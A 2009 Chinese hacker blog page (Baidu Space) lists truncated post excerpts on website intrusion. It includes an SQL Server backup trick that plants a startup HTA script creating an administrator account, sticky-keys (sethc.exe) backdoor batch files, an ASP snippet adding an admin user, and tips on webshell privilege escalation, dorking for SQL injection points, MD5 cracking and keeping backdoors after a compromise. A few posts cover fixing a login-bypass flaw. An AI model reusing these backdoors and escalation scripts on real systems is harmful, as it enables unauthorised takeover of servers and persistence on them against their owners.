爻乂的窝

爻乂的窝

百度空间 | 百度首页

关于我

本人承接SEO服务，有意这可以给我留言。或加我QQ：251323708

你要去。。

文章列表

入侵指定网站

2009-11-09 13:16

1.入侵指定网站；查找SQL注入点；碰到网站地址是以asp？=44.php？=44.等结尾的动态网页注入大家自己在论坛搜索资料。关键词SQL。
这里讲些小经验，有的网页如
http://www.***.com/article/today/265501.html大家知道以HTML结尾的网页一般都是静态的，不存在注入漏洞。但我们注意查看该网页的源码，发现源码中存在这样的内容：
<script language="javascript" src="/common/Dig.aspx?id=265506&modelid=1&css=">
我们可

类别：—●入侵检测●— | 评论(4) | 浏览()

启动项备份hta文件提权

2009-11-09 13:10

连接sql后全部代码如下：

create table [bin_cmd]([cmd] [image]);

declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;

insert into [bin_cmd](cmd)values('<scrIpt language=VBScript>window.moveTo 8888,8888:Set s=CreateObject("Wscript.Shell"):s.Run "cmd.exe /c net user ASPMET 123_asda!@ /add",0:s.Run "cmd.exe /c net localgroup

类别：—●提权技术●— | 评论(0) | 浏览()

服务器后门—Shift后门

2009-11-09 13:00

将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~
后连接对方3389然后连续按5次Shift就能进入盘里了然后进入c:\windows\system32\cmd.exe
或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~哇哈哈哈哈~~~
TITLE Shift后门 @echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo.坏狼安全网http://www.winshell.cn
echo 使用方法:本文件执行完毕后,

类别：—●黑客后门●— | 评论(0) | 浏览()

古老实用的shift漏洞后门

2009-11-06 23:19

批处理：

@echo off
cls
echo 使用方法:本文件执行完毕后
echo 在终端界面按Shift 5次即可登陆系统
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 后门安装完毕
echo. & pause
exit

此段代码保存

类别：—●黑客后门●— | 评论(0) | 浏览()

一些webshell提权的方法

2009-11-06 23:17

现在可以说网络管理员对服务器的设置是越来越BT，但BT的同时，也有黑客朋友们对服务器的不断的测试，在测试中往往获取最低的guest权限是简单的，像我们在入侵网站过程中，获取webshell是简单的，但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法，但是在思考的过程中，又不得不承认，方法是不断的探索中出来的，方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍，对提权的方法进行一些介绍，同时也希望在更多朋

类别：—●提权技术●— | 评论(0) | 浏览()

史上MD5解密之最快方法整理-md5在线加密解密

2009-11-06 23:17

一般来说，形如1e4dc79d489e86b2的16位或者32位密码就是经过MD5加密的，(当然也有特殊，比如DVBBS在登陆时候会先产生一个16位的随机密码,当然，这个密码还是和MD5密码的形式有点区别，相同的是都是16位的数字+字母组合。);
　　这个一般来说可以用一个叫dv.exe的工具来破解。他可以破解加密前是10位以下的纯数字或者纯字母，破解纯数字的，速度超快，但是纯字母的，就慢了，当然他还有其他功能，但是其他功能没什么特别之处，所以不说。

　　破解纯数字时候:dv -p a.txt -b num

　　纯字母: dv -p a.txt -b cha

类别：—●黑客技巧●— | 评论(0) | 浏览()

利用google 百度批量找网站注入点

2009-11-06 23:16

1,
到GoogLe,搜索一些关键字,edit.asp?

2,
到Google ,site:cq.cn inurl:asp

3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'o

类别：—●黑客技巧●— | 评论(0) | 浏览()

2009-11-05 14:30

有很多朋友拿下一些站的shell后，最后走人的时候，肯定是想留个后门在走，但是后门没几天就不见了。这

让一些小黑们很头痛哈，（包括我，哈哈）网上流传的方法也不是很好，只对本人来说哈。

不墨迹了，进正题。

首先拿下shell后，建立一个有...\\这样的文件夹，比如我就在站点跟目录建立个jieshao...\\这样的文件夹，如图

类别：—●黑客后门●— | 评论(0) | 浏览()

修复 'or'='or' 万能登陆密码漏洞

2009-11-02 16:16

我们常常利用"万能密码"登陆了一些站点后台。这时又不想让别人按照同样的方法也进来。我们就必须把这个“万能密码”即'or'='or'的漏洞给修补下。找到后台登陆地址的文件，然后在源代码文件找到了下面这段代码。

<%
pwd = request.form("pwd")

name = request.form("name")

Set rs = Server.CreateObject("ADODB.Connection")

sql = "select * from Manage_User where UserName='" & na

类别：—●黑客后门●— | 评论(0) | 浏览()

清除网马巧妙利用黑客后门webshell清除网马

2009-11-02 15:08

“挂马者”利用注入工具进行扫描到有注入点然后开始注入猜解用户密码扫描后台地址进行登陆后台用后台上传功能上传一个小马(一个执行asp/图片等) 然后得到这个小马地址打开小马写入大马代码然后进行数据库备份小马其实就起到一个上传文件的权限功能/写入这样就成功的拿下站点的 webshell 到这里他就可以想在站点干嘛就干嘛一般都是挂马为目的。建议删除后台管理备份的那个ASP文件/修改别名称，这样他就不可以备份数据库了，你要备份的时候在改名称回来或者重新上传这个后台备份asp

类别：—●黑客技巧●— | 评论(0) | 浏览()

提权加用户代码

2009-11-02 05:27

<%
Set onlineServer=GetObject("WinNT://127.0.0.1")
Set newuser=onlineServer.Create("user","anerle")
NewUser.SetPassword "123456"
NewUser.FullName="anerle test"
NewUser.Description="hacker's example"
NewUser.Setinfo
Set oDomain=GetObject("WinNT://"&"127.0.0.1")
Set oGroup=oDomain.GetObject("Group","administrators")
oGroup.Add ("winnt://hacker

类别：—●提权技术●— | 评论(0) | 浏览()

一段巧妙的提权代码 iIS后门

2009-11-02 05:19

比如我们要看远程机器上开的服务（准备好Pskill，把防火墙先停了），代码如下：
<%Set ComputerObj = GetObject("WinNT://127.0.0.1")
ComputerObj.Filter = Array("Service")
For Each Service in ComputerObj
Response.Write "Service display name = " & Service.DisplayName
Response.Write("<BR>")
Response.Write "Service account name = " & Service.ServiceAccountName
Response.Write("<BR>")
Response

类别：—●提权技术●— | 评论(0) | 浏览()

免费3个月的VPS送独立IP

2009-11-01 03:19

（经测试，这个vps在免费3个月后，可以通过修改个人信息等方式进行重新试用3个月，就是说可以终身免费试用!!!)本人第二次申请试用通过

类别：—●资源共享●— | 评论(0) | 浏览()

赛尔号外挂_赛尔号秘籍_赛尔号外挂的疑问

2009-10-30 12:51

【各精灵的进化及捕捉地点】

1、伊优１６级进化到尤里安，尤里安进化到３６级巴鲁斯（捕捉地点：刚开始或搜集精灵、或在精灵王对战10胜，初始为5级）。

2、小火猴１４级进化到烈火猴，烈火猴３６级进化到烈焰猩猩（捕捉地点：同上，初始为5级）。

3、布布种子１８级进化到布布草，布布草３2级进化到布布花（捕捉地点：同上，初始为5级）。

4、利利21级进化到绵绵，绵绵３７

类别：—●原创作品●— | 评论(0) | 浏览()

国内外著名Google PageRank 预测工具大全

2009-10-30 10:16

Google有很多数据库，同一网址在Google不同数据库中的值是不一样的（据说有678个数据中心），特别是在Google更新PR值的时候，大多数预测网站就是在这些数据中心随机查询多个

类别：—●seo技术●— | 评论(0) | 浏览()

留言板

给他留言

90

你可以说一下你是怎来做的。

2009-11-03 18:01| 回复

89

飘过~~~~~

2009-10-30 13:14| 回复

86

回复yaohack：最近我都没怎么上来而且QQ也一样那
有急事的话直接留言我QQ 我会上来和你说的呵呵真不好意思

2009-10-20 00:05| 回复

84

特意来坐坐，有空去我空间溜达一下啊！顺便看看我的文章哦，可能对你们会有帮助哦。你的空间实在太漂亮了，

2009-10-04 17:11| 回复

83

我换博客了，——爱家

2009-09-28 10:26| 回复

留言(77条)>>

个人档案

yaohack
男, 1岁
湖北随州
上次登录：
17小时前

加为好友

发送消息

背景音乐

百度搜索

文章分类

默认分类(2)

—●入侵检测●—(3)

—●安全防护●—(5)

—●黑客编程●—(16)

—●焦点新闻●—(19)

—●心情日志●—(25)

—●原创作品●—(53)

—●提权技术●—(50)

—●黑客技巧●—(25)

—●资源共享●—(21)

—●教程分享●—(25)

—●脚本入侵●—(51)

—●操作系统●—(26)

—●社会工程●—(2)

—●黑客后门●—(5)

—●隐藏技术●—(3)

—●世间幻境●—(12)

—●漏洞分析●—(3)

—●电脑硬件●—(16)

—●黑客精神●—(2)

—●毒笼世界●—(7)

—●seo技术●—(51)

网站收藏(5)

c#(17)

Sql(4)

Php(3)

软件工程(4)

Ps(0)

Uml(0)

加密破解(6)

软件测试(5)

数据恢复(4)

配置架构(4)

我的奇思妙想(1)

Sem(8)

系统内核(1)

平面设计(7)

实用入侵(1)

最新评论

文章评论|照片评论

回复yaohack：我菜鸟怎么能指点你啊。其实入侵学好脚本+数据库，自己找ODAY，什么...

回复Eveilei：那么多知识,要灵活起来,实实在在结合在一起用，真的不容易。

回复Eveilei：我确实是退步了,好多人都这么说。还请你多指点

我怎么发现你退步了呢？有时候文章挺有技术含量，有时候发些大众知识。并且许多都...

解压不了啊，好像有什么错误啊


回复颓废傻鱼：呵呵


嘴巴左边还P的还有点不太融合哈

好友最新文章

最近访客



CLLO88	水幕天
dfg1986	51gamer
怨念纠结	注册卡卡的是猪
qijie81	zhangyuke12345

友情链接

©2009 Baidu